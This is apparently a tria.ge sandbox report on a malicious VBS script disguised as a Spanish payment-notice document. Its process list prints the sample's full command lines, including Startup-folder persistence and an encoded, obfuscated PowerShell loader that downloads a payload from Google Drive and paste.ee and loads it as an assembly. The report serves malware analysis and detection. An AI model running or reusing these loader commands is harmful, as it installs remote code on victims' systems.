Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
06/11/2024, 21:39
Static task
static1
Behavioral task
behavioral1
Sample
COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs
Resource
win7-20240708-en
General
-
Target
COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs
-
Size
68KB
-
MD5
943b9220d27c71f1f97524ea87db7ebd
-
SHA1
d57a52c81bcff8ea2f4def7646aa9d4fb3dc9972
-
SHA256
370e7db7155cd9b03875431462ffc8223dcc4bf7c1dcb5a07420e84bc6316d93
-
SHA512
a6e66e74af19902ba71154a17f4625690638b57ba2fc419a19040bce1c5c3b81f64049687dd666d0471f6075675ad0c831ebedd8f0cfef1a6de28a65db9bff58
-
SSDEEP
1536:bUJW4Wrle/PhG+/kery+bGNccc3gt5pzKUGwm:jS7rgt5p3Gwm
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 3060 WScript.exe 4 3060 WScript.exe 8 2200 powershell.exe 10 2200 powershell.exe -
pid Process 2720 powershell.exe 328 powershell.exe 2200 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 drive.google.com 8 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2800 cmd.exe 2664 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2664 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2720 powershell.exe 328 powershell.exe 2200 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 328 powershell.exe Token: SeDebugPrivilege 2200 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3060 wrote to memory of 2800 3060 WScript.exe 30 PID 3060 wrote to memory of 2800 3060 WScript.exe 30 PID 3060 wrote to memory of 2800 3060 WScript.exe 30 PID 2800 wrote to memory of 2664 2800 cmd.exe 32 PID 2800 wrote to memory of 2664 2800 cmd.exe 32 PID 2800 wrote to memory of 2664 2800 cmd.exe 32 PID 2800 wrote to memory of 2720 2800 cmd.exe 33 PID 2800 wrote to memory of 2720 2800 cmd.exe 33 PID 2800 wrote to memory of 2720 2800 cmd.exe 33 PID 3060 wrote to memory of 328 3060 WScript.exe 34 PID 3060 wrote to memory of 328 3060 WScript.exe 34 PID 3060 wrote to memory of 328 3060 WScript.exe 34 PID 328 wrote to memory of 2200 328 powershell.exe 36 PID 328 wrote to memory of 2200 328 powershell.exe 36 PID 328 wrote to memory of 2200 328 powershell.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs"1⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\COPIA_ANEXA_DOCUMENTO_DE_REPORTE_Y_NOTIFICACION_POR_SALDOS_PENDIENTES_DE_PAGO_CONCEPTO_OPERACIONES_M.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9NRVs0XSskUFNob21FWzM0XSsnWCcpKCgnNVFWaW1hZ2VVcmwgPSBNVklodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFVeUhxd3JuWENsSycrJ0JKM2o2M0xsMXQyU3RWZ0d4YlN0MCBNVkk7NVFWd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2VudDs1UVZpbWFnZUJ5dGVzID0gNVFWd2ViQ2xpZW50LicrJ0Rvd25sb2FkRGF0YSg1UVZpbWFnZVVybCk7NVFWaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoNVFWaW1hZ2VCeXRlJysncyk7NScrJ1FWc3RhcnRGbGFnID0gTVZJPDxCQVNFNjRfU1RBUlQ+Pk0nKydWSTs1UVZlbmRGbGFnID0gTVZJPDxCQVNFNjRfRU5EPj5NVkk7NVFWJysnc3RhcnRJbmRleCA9IDVRVmltYWdlVGV4dC5JbmRleE9mKDVRVnN0YXJ0RmxhZyk7NVFWZW5kSW5kZXggPSA1UVZpbWFnZVRleHQuSW5kZXhPZig1UVZlbmRGJysnbGFnKTs1UVZzdGEnKydydEluZGV4IC1nZSAwIC1hbmQgNVFWZW5kSW5kZXggLWd0IDVRVnN0YXJ0SW5kJysnZXg7NVFWc3RhcnRJbmRleCArPSA1UVZzdGFydEZsYWcuTGVuZ3RoOzVRVmJhc2UnKyc2NCcrJ0xlbmd0aCA9IDVRVicrJ2VuZEluZGV4IC0gNVFWJysnc3RhcnRJbmRleDs1UVZiYXNlNjRDb21tYW5kID0nKycgNVFWaW1hZ2VUZXh0LlN1YnN0cmluZyg1UVZzdGFydEluZGV4LCA1UVZiYXNlNjRMZW5ndGgpOzVRVmJhc2U2NFJldmVyc2VkID0gLScrJ2pvaW4gKDVRVmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBaYlknKycgRm8nKydyRWFjaC1PYmplY3QgeyA1UVZfIH0pWy0xLi4tKDVRVmJhc2U2NCcrJ0NvbW1hJysnbmQuTGVuZ3RoKV07NScrJ1FWY29tbWFuZEJ5dGVzID0gW1N5c3RlbS4nKydDb252ZXJ0XTo6RnJvbUJhJysnc2U2JysnNFN0cmluZyg1UVZiYXNlNjRSZXZlcnNlZCk7NVFWJysnbCcrJ29hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDVRVmNvbW1hbmRCeXRlJysncyk7NVFWdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChNVklWQUlNVkkpOzVRVnZhaU1ldGhvZC4nKydJbnZva2UoNVFWbnVsbCwgQChNJysnVkkwL2F3aVNJLycrJ2QvZWUuZXRzYXAvLzpzcHR0aE1WSSwgTVZJZGUnKydzYXRpdmFkb01WSSwgTVZJZGVzYXRpdmFkb01WSSwgTVZJZGVzYXRpdmFkb01WSSwgTVZJTVNCdWlsZE1WSSwgTVZJZGVzYXRpdmFkb01WSSwgJysnTVZJZGVzYXRpdmFkb01WSSxNVklkZXNhdGl2YWRvTVZJLCcrJ01WSWRlc2F0aScrJ3ZhZG9NVkksTScrJ1ZJZGVzYXRpdmFkb01WSSxNVklkZXNhdGl2YWRvTVZJLE1WSWRlc2F0aXZhZCcrJ29NVkksJysnTVZJMU1WSSxNVklkZXNhdGl2JysnYWRvTVZJKSk7JykucmVwbGFjZSgoW2NIQVJdOTArW2NIQVJdOTgrW2NIQVJdODkpLFtzdFJpTkddW2NIQVJdMTI0KS5yZXBsYWNlKChbY0hBUl03NytbY0hBUl04NitbY0hBUl03MyksW3N0UmlOR11bY0hBUl0zOSkucmVwbGFjZSgnNVFWJyxbc3RSaU5HXVtjSEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShoME[4]+$PShomE[34]+'X')(('5QVimageUrl = MVIhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClK'+'BJ3j63Ll1t2StVgGxbSt0 MVI;5QVwebClient = New-Object System.Net.WebCli'+'ent;5QVimageBytes = 5QVwebClient.'+'DownloadData(5QVimageUrl);5QVimageText = [System.Text.Encoding]::UTF8.GetString(5QVimageByte'+'s);5'+'QVstartFlag = MVI<<BASE64_START>>M'+'VI;5QVendFlag = MVI<<BASE64_END>>MVI;5QV'+'startIndex = 5QVimageText.IndexOf(5QVstartFlag);5QVendIndex = 5QVimageText.IndexOf(5QVendF'+'lag);5QVsta'+'rtIndex -ge 0 -and 5QVendIndex -gt 5QVstartInd'+'ex;5QVstartIndex += 5QVstartFlag.Length;5QVbase'+'64'+'Length = 5QV'+'endIndex - 5QV'+'startIndex;5QVbase64Command ='+' 5QVimageText.Substring(5QVstartIndex, 5QVbase64Length);5QVbase64Reversed = -'+'join (5QVbase64Command.ToCharArray() ZbY'+' Fo'+'rEach-Object { 5QV_ })[-1..-(5QVbase64'+'Comma'+'nd.Length)];5'+'QVcommandBytes = [System.'+'Convert]::FromBa'+'se6'+'4String(5QVbase64Reversed);5QV'+'l'+'oadedAssembly = [System.Reflection.Assembly]::Load(5QVcommandByte'+'s);5QVvaiMethod = [dnlib.IO.Home].GetMethod(MVIVAIMVI);5QVvaiMethod.'+'Invoke(5QVnull, @(M'+'VI0/awiSI/'+'d/ee.etsap//:sptthMVI, MVIde'+'sativadoMVI, MVIdesativadoMVI, MVIdesativadoMVI, MVIMSBuildMVI, MVIdesativadoMVI, '+'MVIdesativadoMVI,MVIdesativadoMVI,'+'MVIdesati'+'vadoMVI,M'+'VIdesativadoMVI,MVIdesativadoMVI,MVIdesativad'+'oMVI,'+'MVI1MVI,MVIdesativ'+'adoMVI));').replace(([cHAR]90+[cHAR]98+[cHAR]89),[stRiNG][cHAR]124).replace(([cHAR]77+[cHAR]86+[cHAR]73),[stRiNG][cHAR]39).replace('5QV',[stRiNG][cHAR]36) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51bb8573b82994bb53b7e48114751d286
SHA16ddcbee72f6e0ffafa92eab40a0433f65ee42ce6
SHA2565e487946a3bb567823c8df64c13845b7426bea13e99454251c3bf9d7a556b7d7
SHA5121cd518c94ac3ef4197b62bac5d1398cc5c20bf89b394c3d5781dc788ea80f0f83fa13de769f3f3e881d8b9fee6e89deaa16224817f9874ed3bdf53a1c1828152